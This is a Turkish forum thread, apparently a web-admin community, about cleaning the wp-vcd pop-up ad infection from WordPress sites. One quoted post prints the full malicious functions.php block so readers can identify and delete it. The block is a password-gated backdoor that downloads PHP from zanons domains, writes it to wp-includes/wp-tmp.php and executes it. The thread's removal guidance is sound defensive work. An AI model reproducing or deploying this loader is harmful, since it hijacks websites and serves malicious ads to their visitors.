0
Kayıt Ol

Wordpress Pop-up Reklam Virüsü ( wp-tmp & wp-vcd.php )

60

15.394

  • 25-01-2018, 04:44:18
    #28
    YouNeverKnows
    YouNeverKnows
    Üyeliği durduruldu
    HelixTm adlı üyeden alıntı: mesajı görüntüle
    Bu işte hocam. Ben sana dedim, kodun tamamını at diye.
    Basta anlamadim hocam ama bende wp cd dosyası olmadığı için girememiş onu önceden sildik çünkü
  • 17-03-2018, 15:32:25
    #29
    iCon
    iCon
    Bu açık hala düzeltilmemiş. dikkatli olmanızda tavsiye var. Proxy ile siteyi kontrol etmesem farkında olmayacağım. Üzücü bir durum
  • 28-03-2018, 00:45:02
    #30
    constantine38
    constantine38
    Allah razı olsun hocam. Neredeyse 1-2 haftadır bunu arıyordum. Bir türlü çözümü bulamadım. Aksilik Google Adwords reklamı da onaylanmıyordu kötücül yazılım var sitenizde diye.
  • 07-04-2018, 19:13:05
    #31
    Helix
    Helix
    Botman, Codemaster
    iCon adlı üyeden alıntı: mesajı görüntüle
    Bu açık hala düzeltilmemiş. dikkatli olmanızda tavsiye var. Proxy ile siteyi kontrol etmesem farkında olmayacağım. Üzücü bir durum
    constantine38 adlı üyeden alıntı: mesajı görüntüle
    Allah razı olsun hocam. Neredeyse 1-2 haftadır bunu arıyordum. Bir türlü çözümü bulamadım. Aksilik Google Adwords reklamı da onaylanmıyordu kötücül yazılım var sitenizde diye.
    Rica ederim. Bu virüs hala ortalıkta dolanmaya devam ediyor. Dikkatli olalım, adsense hesaplarınıza dahi sıkıntı çıkarabilir, pop-up reklam kullanıyorlar virüste.
  • 07-04-2018, 19:21:35
    #32
    AJANSTURKA
    AJANSTURKA
    Üyeliği durduruldu
    Yakın zamanda bir kaç sitemde aynı sorun başıma geldi. Wordfence Security – Firewall & Malware Scan eklentisini kurmayı ihmal etmeyin,bu eklenti bu tip kodları kaldırıyor ve bulaşmasını da önlüyor.
  • 08-04-2018, 01:18:28
    #33
    oguzhankayan
    oguzhankayan
    HelixTm adlı üyeden alıntı: mesajı görüntüle
    Merhabalar,

    Bugün keşvettiğim bir virüsün nasıl kaldırılacağına dair bilgi vermek istedim. İlallah ettiriyor ama sonunda buldum. İşin kötü tarafı öyle bir sistem yapmışlar ki, direkt olarak wordpress klasörlerine gönderiyor reklamı ve sonradan tema değişseniz de birşey fark etmiyor. Pluginler aracılığıyla mevcut temanızın functions.php kısmına bir kod yazdırıyorlar. Bu kod wp-includes klasörünün içerisine wp-tmp.php ve wp-vcd.php isminde dosyalar gönderiyor. Bu dosyaları tabi ki bilmeden burda bulmak neredeyse imkansız. Kullanıcı ilk olarak pluginlerden diye düşünüyor. Arıyor tarıyor bulamıyor. ( Bende öyle yaptım. ) Sonra tema değiştiriyor. ( Değiştirse bile nafile çünkü artık virüs sistemde. ) İşin kötü tarafı admin girişi yaptığınızda bu virüs reklam göstermiyor. O kadar şeytani düşünmüşler ki, kullanıcılardan yorum gelmese ben bile farkına varamayacaktım.
    Bu virüsten kurtulmanın tek yolu temadaki kodları silmek ve ilgili bölümdeki dosyaları silmek.
    Temanın functions.php dosyasının üst kısmında şifrelerle başlayan bir bölüm var, bu kısmı güzel bir silin;
     
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'XXXXXXXXXXXXXXXXXXXXXX')) { if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
 
 
 
 
 
 
 
 
 
 

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?phpn" . $phpCode))
           {
           }
            else
            {
            $tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?phpn" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        
$wp_auth_key='08b370e35d008b6591dd40b0eec23025';
        if (($tmpcontent = @file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.zanons.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
          
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif (($tmpcontent = @file_get_contents("http://www.zanons.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
        
        
        
        
        
    }
}
 
 
 
 
?>
    Ardından /wp-includes/ klasörünüze girin ve wp-tmp.php ve wp-vcd.php isimli iki dosyayı silin. Pop-up reklamından kurtuldunuz.

    İnternet ortamında emeğe göz dikenler çok fazla. Lütfen functions.php dosyanızı kontrol edin.


    Hocam worpress konu başlığına girdim, konu açacaktım bu illetten kurtaracak var mı diye, konunuzu gördüm.


    Allah binlerce kez razı olsun.


    Rica etsem imzamdaki sitede, reklam vesaire gören var mı? Mobilde çıkıyordu genelde. Bir test edebilir miyiz beraber?
  • 08-04-2018, 01:25:16
    #34
    Helix
    Helix
    Botman, Codemaster
    oguzhankayan adlı üyeden alıntı: mesajı görüntüle
    Hocam worpress konu başlığına girdim, konu açacaktım bu illetten kurtaracak var mı diye, konunuzu gördüm.


    Allah binlerce kez razı olsun.


    Rica etsem imzamdaki sitede, reklam vesaire gören var mı? Mobilde çıkıyordu genelde. Bir test edebilir miyiz beraber?
    Sorun görünmüyor. Senden de razı olsun. İyi çalışmalar.
  • 22-04-2018, 16:18:44
    #35
    enessafak
    enessafak
    Hocam Allah razı olsun dediklerinizi yaptım umarım tekrar bulaşmaz.
  • 01-05-2018, 13:46:36
    #36
    AntoL-Nyo
    AntoL-Nyo
    "Wordfence Security – Firewall & Malware Scan" Bu eklenti ile ilk başta test ettim fakat hiçbir işe yaramadı. Konuyu açan arkadaşın dediği gibi, "functions" dosyasını temizi ile değiştirmeniz olacaktır. Daha sonra "wp-includes" içerisinde "wp-tmp" siliniz. "wp-feed" içerisine giriş yapan ipleri kayıt altında tutuyor. Bunuda siliniz. Son olarakta tema dosyası içerisine .htaccess oluşturup içerisine,

    Alıntı
    <FilesMatch "^wp-tmp_.*\.php$">
    Order Deny,Allow
    Deny from all
    Allow from 127.0.0.1
    </FilesMatch>


    <Files "wp-tmp.php">
    Order Allow,Deny
    Deny from all
    </Files>
    Eklemeniz yeterli olucaktır.

    Büyük ihtimalle kurduğumuz eklentilerden birinde açık vardı ve bundan kaynaklı olduğunu düşünüyorum.